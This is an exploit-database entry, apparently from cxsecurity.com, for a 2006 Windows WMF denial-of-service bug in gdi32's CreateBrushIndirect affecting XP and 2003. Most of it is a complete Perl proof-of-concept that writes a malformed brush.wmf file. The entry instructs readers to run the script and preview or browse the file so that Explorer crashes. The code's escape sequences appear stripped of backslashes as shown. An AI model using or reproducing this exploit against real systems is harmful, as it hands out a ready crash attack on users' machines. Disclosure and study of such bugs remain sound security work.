0-day XP SP2 wmf exploit

Risk: Low
Local: Yes
Remote: Yes
CWE: CWE-Other

CVSS Base Score: 2.6/10
Impact Subscore: 2.9/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

Description: yet another 'windows meta file' (WMF) denial of service exploit. System affected: + Windows XP SP2, + Windows 2003 SP1, + Windows XP SP1, + Windows XP + Windows 2003 Tech info: page fault in gdi32!CreateBrushIndirect() because invalid pointer access. Incorrect (short) to (void*) sign extension also present. Exploit: === begin of brush.pl === #!/usr/bin/perl print "nWMF PoC denial of service exploit by cyanid-E <biz4rre@gmail.com>"; print "nngenerating brush.wmf..."; open(WMF, ">./brush.wmf") or die "cannot create wmf filen"; print WMF "x01x00x09x00x00x03x22x00x00x00x63x79x61x6Ex69x64"; print WMF "x2Dx45x07x00x00x00xFCx02x00x00x00x00x00x00x00x00"; print WMF "x08x00x00x00xFAx02x00x00x00x00x00x00x00x00x00x00"; print WMF "x07x00x00x00xFCx02x08x00x00x00x00x00x00x80x03x00"; print WMF "x00x00x00x00"; close(WMF); print "oknnnow try to browse folder in XP explorer and wait :)n"; === end of brush.pl === Just run brush.pl and try to preview brush.wmf (or even browse folder with brush.wmf in windows explorer). Discovered: 06/24/2006; vendor informed but not answered

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023, cxsecurity.com


Back to Top